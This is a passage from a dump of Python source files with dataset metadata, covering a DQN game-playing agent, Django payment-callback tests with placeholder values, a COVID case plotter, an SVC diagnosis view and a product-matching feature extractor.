range(num_timesteps):\n self.env.render()\n\n #epsilon = utils.linear_explore(self.init_explore, self.final_explore, self.explore_timesteps, timestep)\n epsilon = utils.update_epsilon(timestep)\n self.writer.add_scalar('num_episodes/epsilon', epsilon, timestep)\n if random.random() > epsilon:\n action = self.action(current_state)\n else:\n action = torch.tensor(self.env.action_space.sample())\n\n # the observation returned by the environment is a LazyFrame object, which I don't really want\n # convert this next_state into a numpy array. 
Much easier to handle\n #Todo\n # action.item() is for the Mario environment\n # if running Atari, just pass action directly\n next_state, reward, done, info = self.env.step(action.item())\n\n tot_reward += reward\n next_state = torch.FloatTensor(next_state)\n\n size = self.storage.store(current_state, action, reward, next_state, done)\n\n # Build up some experience in the buffer first, then start training.\n\n if timestep > 30000:\n if timestep == 30001:\n print('Training Starts : ', time.time())\n\n loss = self.optimize(timestep)\n self.writer.add_scalar('timestep/loss', loss, timestep)\n\n if timestep % 2000 == 0:\n print('timestep : ', timestep)\n print('Loss : ', loss)\n\n if done:\n mean_reward_list.append(tot_reward)\n mean_reward = np.mean(mean_reward_list[-100:])\n\n if self.best_reward_mean is None or mean_reward > self.best_reward_mean:\n self.best_reward_mean = mean_reward\n\n print(\"%d: %d games, mean reward %.3f, current reward %.3f ,(epsilon %.2f)\" % (timestep, len(mean_reward_list), mean_reward, tot_reward,epsilon))\n\n current_state = self.env.reset()\n current_state = torch.FloatTensor(current_state)\n self.writer.add_scalar('num_episodes/reward', tot_reward, timestep)\n num_episodes += 1\n tot_reward = 0\n else:\n current_state = next_state\n def optimize(self, timestep):\n \"\"\"\n We want to optimize the train_net every time, but only want to update the target_net every N times.\n Actually, the target_net should only copy the parameters of the train_net, not be optimized;\n torch provides load_state_dict() for exactly that.\n \"\"\"\n update_step = 5000\n current_state_batch = None\n reward_batch = None\n next_state_batch = None\n done_batch = None\n\n # Strange - looking at this, training does not seem to progress at all...?!\n # Check whether model parameter has been updated.... And it has!\n # old = list(self.train_net.parameters())[0].clone()\n # print(\"=\"*50)\n # print(self.train_net.state_dict().get('cnn1.weight')[0][3])\n # print(\"=\"*50)\n # print(self.target_net.state_dict().get('fc1.weight'))\n\n loss_array = []\n # Obtain the train_batch\n batch = self.storage.sample(32)\n\n current_state_batch, action_batch, reward_batch, next_state_batch, done_batch = batch\n\n # target_batch = reward_batch + self.lmbda * torch.max(self.target_net(next_state_batch), axis=1).values * (1-done_batch)\n\n target_batch = reward_batch + self.lmbda * self.target_net(next_state_batch).max(1)[0].detach() * (1 - done_batch)\n\n #train_batch = self.train_net(current_state_batch)\n #train_batch = train_batch[torch.arange(train_batch.size(0)), action_batch]\n train_batch = self.train_net(current_state_batch).gather(1, action_batch.unsqueeze(-1)).squeeze(-1)\n\n\n loss = self.loss_func(train_batch, target_batch)\n self.optimizer.zero_grad()\n loss.backward()\n # Not sure about this... Is this the main problem? ==> Doesn't seem so...\n #for param in self.train_net.parameters():\n #param.grad.data.clamp_(-1, 1)\n self.optimizer.step()\n\n\n if timestep % update_step == 0:\n # Successfully checked target network parameters being updated\n print('NETWORK UPDATED AND SAVED')\n self.target_net.load_state_dict(self.train_net.state_dict())\n torch.save(self.train_net.state_dict(), self.env_name + '-best_model_')\n\n\n # Check whether the train_net parameters have been updated.... And they have!\n # new = list(self.train_net.parameters())[0].clone()\n\n loss_array.append(loss)\n\n return (np.sum(np.array(loss_array)))\n
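\n # Summary of the update implemented in optimize() above (all names exist in this class):\n # target = r + lmbda * max_a Q_target(s', a) * (1 - done)\n # loss = SmoothL1(Q_train(s, a), target)\n # Every update_step timesteps, target_net is re-synced from train_net via\n # load_state_dict(), which is what keeps the bootstrap targets stable.\n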
\n def evaluate(self):\n \"\"\"\n used to play the best learned model\n \"\"\"\n self.train_net = torch.load(self.env_name + '-best_model_')\n\n mean_reward_list = []\n tot_reward = 0\n current_state = self.env.reset()\n current_state = torch.FloatTensor(current_state)\n num_episodes = 0\n timestep = 0\n while True:\n self.env.render()\n\n action = self.action(current_state)\n\n # the observation returned by the environment is a LazyFrame object, which I don't really want\n # convert this next_state into a numpy array. Much easier to handle\n next_state, reward, done, info = self.env.step(action)\n tot_reward += reward\n next_state = torch.FloatTensor(next_state)\n timestep += 1\n\n if done:\n mean_reward_list.append(tot_reward)\n mean_reward = np.mean(mean_reward_list[-100:])\n\n print(\"%d: %d games, mean reward %.3f\" % (timestep, len(mean_reward_list), mean_reward))\n\n current_state = self.env.reset()\n current_state = torch.FloatTensor(current_state)\n num_episodes += 1\n tot_reward = 0\n else:\n current_state = next_state\n\n\n\n def optimize_faulty_trash(self, timestep):\n \"\"\"\n This is messed up....\n Need to erase this\n\n \"\"\"\n current_state_batch = None\n reward_batch = None\n next_state_batch = None\n done_batch = None\n\n\n # Strange - looking at this, training does not seem to progress at all...?!\n # Check whether model parameter has been updated.... And it has!\n #old = list(self.train_net.parameters())[0].clone()\n #print(\"=\"*50)\n #print(self.train_net.state_dict().get('cnn1.weight')[0][3])\n #print(\"=\"*50)\n #print(self.target_net.state_dict().get('fc1.weight'))\n\n loss_array = []\n #Obtain the train_batch\n batch = self.storage.sample(32)\n\n current_state_batch, action_batch, reward_batch, next_state_batch, done_batch = batch\n current_state_batch =current_state_batch.cpu().permute(0,3,1,2).to(self.device)\n action_batch = action_batch.tolist()\n #reward_batch = reward_batch.cpu().to(self.device)\n next_state_batch = next_state_batch.cpu().permute(0,3,1,2).to(self.device)\n #done_batch = done_batch.cpu().to(self.device)\n\n #target_batch = reward_batch + self.lmbda * torch.max(self.target_net(next_state_batch), axis=1).values * (1-done_batch)\n\n target_batch = reward_batch + self.lmbda * self.target_net(next_state_batch).max(1)[0].detach() * (1 - done_batch)\n\n import pdb\n pdb.set_trace()\n train_batch1 = self.train_net(current_state_batch).gather(1, action_batch.unsqueeze(-1)).squeeze(-1)\n\n train_batch = self.train_net(current_state_batch)\n train_batch = train_batch[torch.arange(train_batch.size(0)), action_batch]\n\n loss = self.loss_func(train_batch, target_batch)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n #Not sure about this... Is this the main problem? ==> Doesn't seem so...\n #for param in self.train_net.parameters():\n #param.grad.data.clamp_(-1, 1)\n\n\n if timestep % 1000 == 0:\n for name, param in self.train_net.named_parameters():\n self.writer.add_histogram(name, param.clone().cpu().data.numpy(), timestep)\n self.writer.add_histogram(name+'.grad', param.grad.clone().cpu().data.numpy(), timestep)\n\n #Check whether the train_net parameters has been updated.... 
And it has!!\n #new = list(self.train_net.parameters())[0].clone()\n\n loss_array.append(loss)\n\n return (np.sum(np.array(loss_array)))\n","sub_path":"DQN_agent.py","file_name":"DQN_agent.py","file_ext":"py","file_size_in_byte":10841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"11991870","text":"from copy import deepcopy\nfrom unittest import mock\nfrom urllib.parse import urlencode\n\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom django.test.utils import override_settings\nfrom django.urls import reverse\n\nfrom cardsave.models import PaymentResult\nfrom cardsave.signals import payment_successful, payment_unsuccessful\n\n\n@override_settings(ROOT_URLCONF='cardsave.tests.test_urls')\n@override_settings(CARDSAVE_MERCHANT_ID = 'TestMerchantID')\n@override_settings(CARDSAVE_CURRENCY_CODE = 826) # ISO 4217 GBP\n@override_settings(CARDSAVE_ORDER_MODEL = 'cardsave.tests.models.Order')\n@override_settings(CARDSAVE_PRESHARED_KEY = 'TestPresharedKey')\n@override_settings(CARDSAVE_PASSWORD = 'TestPassword')\nclass PaymentResultTest(TestCase):\n\n def setUp(self):\n self.RESULT_POST_PARAMS = {\n \"HashDigest\": 'e8d9beccde7b4f1c96c203546059242a270519f7',\n \"MerchantID\": settings.CARDSAVE_MERCHANT_ID,\n \"StatusCode\": 0,\n \"Message\": 'Test message',\n \"PreviousStatusCode\": 0,\n \"PreviousMessage\": ' ',\n \"CrossReference\": ' ',\n \"Amount\": 500, # £5 in pence\n \"CurrencyCode\": 826, # ISO 4217 GBP\n \"OrderID\": '1',\n \"TransactionType\": 'SALE',\n \"TransactionDateTime\": '2015-05-11 10:00:00 +00:00',\n \"OrderDescription\": 'Test description',\n \"CustomerName\": 'Test name',\n \"Address1\": 'Address line 1',\n \"Address2\": 'Address line 2',\n \"Address3\": 'Address line 3',\n \"Address4\": 'Address line 4',\n \"City\": 'TestCity',\n \"State\": 'TestState',\n \"PostCode\": 'APOSTCODE',\n \"CountryCode\": 826,\n \"EmailAddress\": 'test@example.com'\n }\n\n\n def do_post(self, post_params):\n with mock.patch('cardsave.tests.models.Order') as mock_order:\n mock_order.objects = mock.Mock()\n\n conf = {'get.return_value': mock.Mock(\n total_price = 5\n )}\n mock_order.objects.configure_mock(**conf)\n\n post_data = urlencode(post_params)\n response = self.client.post(reverse('cardsave-result'), post_data, content_type='application/x-www-form-urlencoded')\n\n self.assertEqual(response.status_code, 200)\n\n return response\n\n\n def assert_got_signal(self, signal, post_params):\n self.got_signal = False\n self.signal_obj = None\n\n def handle_signal(sender, **kwgargs):\n self.got_signal = True\n self.signal_obj = sender\n\n signal.connect(handle_signal)\n\n response = self.do_post(post_params)\n self.assertTrue(response.content.startswith(b'StatusCode=0'))\n\n payment_results = PaymentResult.objects.all()\n self.assertEqual(len(payment_results), 1)\n payment_result = payment_results[0]\n\n self.assertTrue(self.got_signal)\n self.assertEqual(self.signal_obj, payment_result)\n\n\n def test_payment_result_invalid_hash(self):\n result_post_params = deepcopy(self.RESULT_POST_PARAMS)\n result_post_params['HashDigest'] = 'InvalidHash'\n response = self.do_post(result_post_params)\n self.assertTrue(response.content.startswith(b'StatusCode=30'))\n\n\n def test_payment_successful_signal_received(self):\n self.assert_got_signal(payment_successful, self.RESULT_POST_PARAMS)\n\n\n def test_payment_unsuccessful_signal_received(self):\n result_post_params = deepcopy(self.RESULT_POST_PARAMS)\n 
result_post_params['StatusCode'] = 4\n result_post_params['HashDigest'] = 'b036c86ce4ad38f3282603a688510cdd47b18849'\n self.assert_got_signal(payment_unsuccessful, result_post_params)\n\n\n def test_payment_successful_transaction_datetime_offset(self):\n result_post_params = deepcopy(self.RESULT_POST_PARAMS)\n result_post_params['TransactionDateTime'] = '2017-07-18 19:30:00 +01:00'\n result_post_params['HashDigest'] = '3aaf42f7db2b9c8d495fc49c7f446b54b0e8795b'\n self.assert_got_signal(payment_successful, result_post_params)\n","sub_path":"paintingdreams/cardsave/tests/test_payment_result.py","file_name":"test_payment_result.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"471273192","text":"import pandas as reader\nimport plotly.io as pio\n\n# Read data source.\nfile_path = 'covid-data/200511COVID19MEXICO.csv'\ndata = reader.read_csv(file_path, encoding='unicode_escape')\ninputDict = data.to_dict(orient='records')\n\nresults = {}\n# Process each entry, collecting everything needed in a single pass over the data.\nfor entry in inputDict:\n if entry['RESULTADO'] == 1:\n if entry['FECHA_INGRESO'] in results.keys():\n results[entry['FECHA_INGRESO']] += 1\n else:\n results[entry['FECHA_INGRESO']] = 1\n\nsortedResults = {key: results[key] for key in sorted(results)}\nprint(sortedResults)\ngraph = dict({\n \"data\": [{\"type\": \"scatter\",\n \"x\": list(sortedResults.keys()),\n \"y\": list(sortedResults.values())\n }],\n \"layout\": {\"title\": {\"text\": \"Time series of confirmed cases\"}}\n})\npio.show(graph)\n","sub_path":"graphicator-by-history.py","file_name":"graphicator-by-history.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385519195","text":"from django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom django.http import HttpResponse\r\nfrom django.template import loader\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom warnings import simplefilter\r\nsimplefilter(action='ignore', category=FutureWarning)\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import metrics\r\n@csrf_exempt\r\ndef index(request):\r\n if request.method == 'POST':\r\n Radius = request.POST.get('Radius')\r\n Texture = request.POST.get('Texture')\r\n Perimeter = request.POST.get('Perimeter')\r\n Area = request.POST.get('Area')\r\n df = pd.read_csv('data.csv')\r\n X = df[['Radius_mean','Texture_mean','Perimeter_mean','Area_mean']]\r\n y = df['Diagnosis']\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=10)\r\n from sklearn.svm import SVC\r\n svs = SVC(kernel='linear')\r\n svs.fit(X_train, y_train)\r\n y_pred = svs.predict(X_test)\r\n new = {'Radius': [123],\r\n 'Texture': [121],\r\n 'Perimeter': [122],\r\n 'Area': [111]\r\n }\r\n new['Radius'][0] = float(Radius)\r\n new['Texture'][0] = float(Texture)\r\n new['Perimeter'][0] = float(Perimeter)\r\n new['Area'][0] = int(Area)\r\n df2 = pd.DataFrame(new, columns=['Radius', 'Texture','Perimeter','Area'])\r\n y_pred = svs.predict(df2)\r\n name=str(y_pred[0])\r\n context = {\r\n 'name' : name,\r\n }\r\n template = loader.get_template('shwdta.html')\r\n return HttpResponse(template.render(context, request))\r\n else:\r\n template = loader.get_template('indx.html')\r\n return HttpResponse(template.render())
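\r\n\r\n# Note: as written, index() re-reads data.csv and refits the SVC on every\r\n# POST request. A common fix (sketch only; CLASSIFIER is a hypothetical\r\n# module-level name, not part of this view) is to fit once at import time\r\n# and reuse it inside the view:\r\n# CLASSIFIER = SVC(kernel='linear').fit(X_train, y_train)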
","sub_path":"Diagnosispro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"17796597","text":"from django.utils import simplejson\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response\n\ndef active_login_required(view_func):\n def wrap(request, *args, **kwargs):\n if request.user.is_authenticated():\n return view_func(request, *args, **kwargs)\n c = {'statusMessage' : 'Please Login'}\n if request.is_ajax(): # ajax call #\n json = simplejson.dumps(c)\n return HttpResponse(json, mimetype='application/json; charset=utf-8')\n return render_to_response('login.html', c)\n wrap.__doc__ = view_func.__doc__\n wrap.__dict__ = view_func.__dict__\n return wrap\n\n","sub_path":"sportland/users/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601532626","text":"#8\n\nlista = []\nfor i in range(5):\n pessoa = []\n pessoa.append(int(input(\"Age: \")))\n pessoa.append(float(input(\"Height: \")))\n print(\"#####\")\n lista.append(pessoa)\n\nfor i in range(len(lista)-1,-1,-1):\n print(f\"age: {lista[i][0]} , height: {lista[i][1]}\")","sub_path":"lista-2/ex8.py","file_name":"ex8.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"274331803","text":"import pandas as pd\nimport numpy as np\nimport re\nimport cfepm.nlp.preprocessing as nlp\nfrom cfepm.util.io_utils import get_resource_reader\n# from tqdm import tqdm\nfrom collections import defaultdict\nimport logging\n\n_RE_SPEC_KEY_VALUE = re.compile(r\"\"\"'(.+?)':\\s+'(.+?)';\"\"\")\n_log = logging.getLogger(__name__)\n\n\ndef parse_specs(v):\n if pd.isnull(v):\n return {}\n if isinstance(v, dict):\n d = v\n return {k.strip().lower(): _item_spec_val_to_str(v) for k, v in d.items()}\n # assume v is a string\n txt = v\n return {t[0].strip().lower(): t[1].strip() for t in _RE_SPEC_KEY_VALUE.findall(txt) if len(t) == 2}\n\n\ndef _item_spec_val_to_str(v):\n if v is None:\n return None\n if isinstance(v, list):\n return ', '.join(str(e) for e in v)\n if not isinstance(v, str):\n log = logging.getLogger(__name__)\n log.warning(\"Non-str value of item spec: %s\", v)\n return str(v)\n return v\n\n\ndef parse_specs_and_tokenize_vals(txt):\n raw_dict = parse_specs(txt)\n return {k: nlp.tokenize(v) for k, v in raw_dict.items()}\n\n\ndef tokenize_cols(df, *cols):\n if not cols:\n raise ValueError(\"At least single column name was expected!\")\n for col_name in cols:\n _log.debug(\"Tokenizing %s\", col_name)\n df[col_name + '_tokenized'] = df[col_name].apply(nlp.tokenize)\n return df\n\n\ndef tokenize_item(item):\n if item.title_tokenized is None and item.title is not None:\n item.title_tokenized = nlp.tokenize(item.title)\n #if item.description_tokenized is None and item.description is not None:\n # item.description_tokenized = nlp.tokenize(item.description)\n if item.spec_dict_tokenized is None and item.spec_dict is not None:\n item.spec_dict_tokenized = parse_specs_and_tokenize_vals(item.spec_dict)\n\n\ndef item_recognize_numal_expressions(item):\n if item.numal_set is None:\n token_seq_list = []\n if item.title_tokenized is not None:\n token_seq_list.append(item.title_tokenized)\n if item.description_tokenized is not None:\n token_seq_list.append(item.description_tokenized)\n if 
item.spec_dict_tokenized is not None:\n token_seq_list += (v for v in item.spec_dict_tokenized.values())\n item.numal_set = set(t for token_seq in token_seq_list for t in token_seq if _is_numal_expr(t))\n\n\ndef recognize_numal_expessions(df, target_col, *tokenized_cols):\n if not tokenized_cols:\n raise ValueError(\"At least single column name was expected!\")\n _log.debug(\"Computing %s\", target_col)\n\n def f(row_ss):\n result_set = set()\n for col in tokenized_cols:\n col_val = row_ss[col]\n if col_val is None:\n continue\n if isinstance(col_val, list):\n token_seq = col_val\n result_set.update(t for t in token_seq if _is_numal_expr(t))\n elif isinstance(col_val, dict):\n col_dict = col_val\n result_set.update(t for v in col_dict.values() for t in v if _is_numal_expr(t))\n else:\n raise ValueError(\"Can't handle value of type: %s\" % type(col_val))\n return result_set\n\n result_ss = df.apply(f, axis=1)\n df[target_col] = result_ss\n return df\n\n\ndef _read_colour_set():\n with get_resource_reader('cfepm.nlp', 'colours.txt') as inp:\n lines = (l.strip() for l in inp)\n lines = (l for l in lines if l and not l.startswith('#'))\n return frozenset(lines)\n\n\n_COLOURS = _read_colour_set()\n\n\ndef item_recognize_colours(item):\n if item.colour_set is None and item.title_tokenized is not None:\n item.colour_set = set(t for t in item.title_tokenized if _is_colour(t))\n\n\ndef recognize_colours_df(df, target_col, *tokenized_cols):\n if not tokenized_cols:\n raise ValueError(\"At least single column name was expected!\")\n _log.debug(\"Computing %s\", target_col)\n\n def f(row_ss):\n result_set = set()\n for col in tokenized_cols:\n col_val = row_ss[col]\n if col_val is None:\n continue\n if isinstance(col_val, list):\n token_seq = col_val\n result_set.update(t for t in token_seq if _is_colour(t))\n elif isinstance(col_val, dict):\n col_dict = col_val\n result_set.update(t for v in col_dict.values() for t in v if _is_colour(t))\n else:\n raise ValueError(\"Can't handle value of type: %s\" % type(col_val))\n return result_set\n\n result_ss = df.apply(f, axis=1)\n df[target_col] = result_ss\n return df\n\n\ndef _is_numal_expr(s):\n return next((ch for ch in s if str.isdigit(ch)), None)\n\n\ndef _is_colour(s):\n return s in _COLOURS\n\n\ndef parse_spec_cols(df, *cols):\n if not cols:\n raise ValueError(\"At least single column name was expected!\")\n for col_name in cols:\n _log.debug(\"Parsing specs in %s\", col_name)\n df[col_name + '_dict'] = df[col_name].apply(parse_specs_and_tokenize_vals)\n return df\n\n\ndef _tokenize_cols_ss(ss, cols):\n result_dict = {col_name + '_tokenized': nlp.tokenize(ss[col_name]) for col_name in cols}\n return pd.Series(result_dict)\n\n\ndef item_apply_fasttext(ft_model, item):\n if item.title_vector is None and item.title_tokenized is not None:\n item.title_vector, item.title_oov = _text_to_vector_fasttext(ft_model, item.title_tokenized)\n\n\nclass FeatureExtractor:\n def __init__(self, feature_name):\n self.feature_name = feature_name\n\n def extract(self, item1, item2):\n pass\n\n\nclass TwoArgComparisonBasedFE(FeatureExtractor):\n def __init__(self, feature_name, col1_name, col2_name, none_result=0):\n super().__init__(feature_name)\n self.col1_name = col1_name\n self.col2_name = col2_name\n self.none_result = none_result\n\n def extract(self, item1, item2):\n v1 = getattr(item1, self.col1_name)\n if v1 is None:\n return self.none_result\n v2 = getattr(item2, self.col2_name)\n if v2 is None:\n return self.none_result\n return self.extract_by_comparison(v1, 
v2)\n\n def extract_by_comparison(self, val1, val2):\n pass\n\n\nclass SharedWordNumFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_token_list, second_token_list):\n return len(set(first_token_list) & set(second_token_list))\n\n def __str__(self):\n return \"%s: SharedWordNum b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass WordJaccardFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_token_list, second_token_list):\n if first_token_list or second_token_list:\n return jaccard_sim(set(first_token_list), set(second_token_list))\n else:\n return 0\n\n def __str__(self):\n return \"%s: WordJaccard b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass ExactlySharedSpecNumFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n if len(first_spec_dict) <= len(second_spec_dict):\n x_dict = first_spec_dict\n y_dict = second_spec_dict\n else:\n x_dict = second_spec_dict\n y_dict = first_spec_dict\n share_count = 0\n for spec_key, x_val in x_dict.items():\n y_val = y_dict.get(spec_key)\n if x_val == y_val:\n share_count += 1\n return share_count\n\n def __str__(self):\n return \"%s: ExactlySharedSpecNum b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass ExactlySharedSpecPartFE(ExactlySharedSpecNumFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n shared_num = super().extract_by_comparison(first_spec_dict, second_spec_dict)\n denom = max(len(first_spec_dict), len(second_spec_dict))\n if denom == 0:\n return 0\n return shared_num / denom\n\n def __str__(self):\n return \"%s: ExactlySharedSpecPart b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass JaccardSharedSpecNumFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n if len(first_spec_dict) <= len(second_spec_dict):\n x_dict = first_spec_dict\n y_dict = second_spec_dict\n else:\n x_dict = second_spec_dict\n y_dict = first_spec_dict\n result = 0\n for spec_key, x_val in x_dict.items():\n y_val = y_dict.get(spec_key)\n if not y_val:\n continue\n x_set = set(x_val)\n y_set = set(y_val)\n result += jaccard_sim(x_set, y_set)\n return result\n\n def __str__(self):\n return \"%s: JaccardSharedSpecNum b/n %s and %s\" % (self.feature_name, self.col1_name, self.col2_name)\n\n\nclass JaccardSharedSpecPartFE(JaccardSharedSpecNumFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n shared_num = super().extract_by_comparison(first_spec_dict, second_spec_dict)\n denom = max(len(first_spec_dict), len(second_spec_dict))\n if denom == 0:\n return 0\n return shared_num / denom\n\n def __str__(self):\n return \"%s: JaccardSharedSpecPart b/n %s and %s\" % (self.feature_name, self.col1_name, 
self.col2_name)\n\n\nclass ParsedSpecFE(TwoArgComparisonBasedFE):\n def __init__(self, feature_name, col1_name, col2_name):\n super().__init__(feature_name, col1_name, col2_name)\n\n def extract_by_comparison(self, first_spec_dict, second_spec_dict):\n max_key_num = max(len(first_spec_dict), len(second_spec_dict))\n shared_keys = first_spec_dict.keys() & second_spec_dict.keys()\n unshared_keys = first_spec_dict.keys() ^ second_spec_dict.keys()\n if max_key_num == 0:\n # TODO most of the values here should be N/A-like\n shared_keys_num = 0\n shared_keys_part = 0\n unshared_keys_num = 0\n unshared_keys_part = 0\n else:\n shared_keys_num = len(shared_keys)\n shared_keys_part = shared_keys_num / max_key_num\n unshared_keys_num = len(unshared_keys)\n unshared_keys_part = unshared_keys_num / max_key_num\n #\n shared_exactly_counter = 0\n shared_jaccard_counter = 0\n shared_levenshtein_counter = 0\n max_val_chars = 0\n for k in shared_keys:\n x_toks = first_spec_dict.get(k)\n y_toks = second_spec_dict.get(k)\n if x_toks or y_toks:\n if x_toks == y_toks:\n shared_exactly_counter += 1\n shared_jaccard_counter += jaccard_sim(set(x_toks), set(y_toks))\n x_joined = ' '.join(x_toks)\n y_joined = ' '.join(y_toks)\n shared_levenshtein_counter += levenshtein(x_joined, y_joined)\n max_val_chars += max(len(x_joined), len(y_joined))\n if shared_keys_num == 0:\n # TODO most of the values here should be N/A-like\n shared_exactly_num = 0\n conflicting_exactly_num = 0\n shared_exactly_part = 0\n conflicting_exactly_part = 0\n shared_jaccard_sum = 0\n conflicting_jaccard_sum = 0\n shared_jaccard_part = 0\n conflicting_jaccard_part = 0\n shared_leven_sum = 0\n shared_leven_part = 0\n else:\n shared_exactly_num = shared_exactly_counter\n conflicting_exactly_num = shared_keys_num - shared_exactly_num\n shared_exactly_part = shared_exactly_num / shared_keys_num\n conflicting_exactly_part = conflicting_exactly_num / shared_keys_num\n shared_jaccard_sum = shared_jaccard_counter\n conflicting_jaccard_sum = shared_keys_num - shared_jaccard_sum\n shared_jaccard_part = shared_jaccard_sum / shared_keys_num\n conflicting_jaccard_part = conflicting_jaccard_sum / shared_keys_num\n shared_leven_sum = shared_levenshtein_counter\n if max_val_chars > 0:\n shared_leven_part = shared_leven_sum / max_val_chars\n else:\n shared_leven_part = 0\n #\n return [\n shared_keys_num,\n shared_keys_part,\n unshared_keys_num,\n unshared_keys_part,\n shared_exactly_num,\n shared_exactly_part,\n conflicting_exactly_num,\n conflicting_exactly_part,\n shared_jaccard_sum,\n shared_jaccard_part,\n conflicting_jaccard_sum,\n conflicting_jaccard_part,\n shared_leven_sum,\n shared_leven_part,\n ]\n\n\ndef jaccard_sim(s1, s2):\n isect = s1 & s2\n return len(isect) / (len(s1) + len(s2) - len(isect))\n\n\ndef levenshtein(s1, s2):\n if len(s1) < len(s2):\n return levenshtein(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[\n j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\n\ndef extract_discriminator_word_features(train_indices, arg_df, tokenized_col1_name, tokenized_col2_name):\n df = arg_df.iloc[train_indices,\n 
[arg_df.columns.get_loc(cn) for cn in [\"item_yn\", tokenized_col1_name, tokenized_col2_name]]]\n    # TODO\n\n\nclass FoldDependentFeatureExtractor:\n    def extract(self, df, row_i):\n        pass\n\n\nclass DiscriminatorWordsFeatureExtractor(FoldDependentFeatureExtractor):\n    def __init__(self, arg_df, train_indices, tokenized_col1_name, tokenized_col2_name, freq_threshold=3):\n        df = arg_df.iloc[train_indices,\n                         [arg_df.columns.get_loc(cn) for cn in [\"item_yn\", tokenized_col1_name, tokenized_col2_name]]]\n        #\n        print(\"Computing word discr table for cols %s and %s...\" % (tokenized_col1_name, tokenized_col2_name))\n        word_dict = defaultdict(DiscrCounters)\n        for row_tuple in df.itertuples():\n            match = row_tuple[1] == 'yes'\n            a_set = _to_set_safe(row_tuple[2])\n            b_set = _to_set_safe(row_tuple[3])\n            shared_set = a_set & b_set\n            unshared_set = a_set ^ b_set\n            for w in shared_set:\n                w_counter = word_dict[w]\n                if match:\n                    w_counter.match_shared += 1\n                else:\n                    w_counter.nonmatch_shared += 1\n            for w in unshared_set:\n                w_counter = word_dict[w]\n                if match:\n                    w_counter.match_unshared += 1\n                else:\n                    w_counter.nonmatch_unshared += 1\n        print(\"Words before pruning: %s\" % len(word_dict))\n        self.word_counters = {w: w_counter for w, w_counter in word_dict.items() if w_counter.freq() >= freq_threshold}\n        print(\"Words after pruning: %s\" % len(self.word_counters))\n\n\ndef _to_set_safe(l):\n    \"\"\"\n    :param l: a list or None\n    :return: a set\n    \"\"\"\n    if l is None:\n        return set()\n    else:\n        return set(l)\n\n\nclass DiscrCounters:\n    def __init__(self):\n        self.match_shared = 0\n        self.match_unshared = 0\n        self.nonmatch_shared = 0\n        self.nonmatch_unshared = 0\n\n    def freq(self):\n        return self.match_shared + self.match_unshared + self.nonmatch_shared + self.nonmatch_unshared\n\n    def shared_ratio(self):\n        if self.match_shared == 0:\n            return 0\n        if self.nonmatch_shared == 0:\n            return float(\"inf\")\n        return self.match_shared / self.nonmatch_shared\n\n\nclass SpecValInTitleFeatureExtractor(TwoArgComparisonBasedFE):\n    def __init__(self, feature_name, col1_name, col2_name):\n        super().__init__(feature_name, col1_name, col2_name)\n\n    def extract_by_comparison(self, v1, v2):\n        if isinstance(v1, list) and isinstance(v2, dict):\n            spec_dict = v2\n            txt_tokens = v1\n        elif isinstance(v2, list) and isinstance(v1, dict):\n            spec_dict = v1\n            txt_tokens = v2\n        else:\n            raise ValueError(\"Expected one token list and one spec dict, got: %s and %s\" % (type(v1), type(v2)))\n        result_counter = 0\n        for key, val_tokens in spec_dict.items():\n            if contains_subseq(txt_tokens, val_tokens):\n                result_counter += 1\n        return result_counter\n\n\ndef contains_subseq(seq, sub):\n    if len(sub) > len(seq):\n        return False\n    for i in range(0, len(seq) - len(sub) + 1):\n        if seq[i:i + len(sub)] == sub:\n            return True\n    return False\n\n\nclass IterableColumnMismatchFeatureExtractor(TwoArgComparisonBasedFE):\n    def __init__(self, 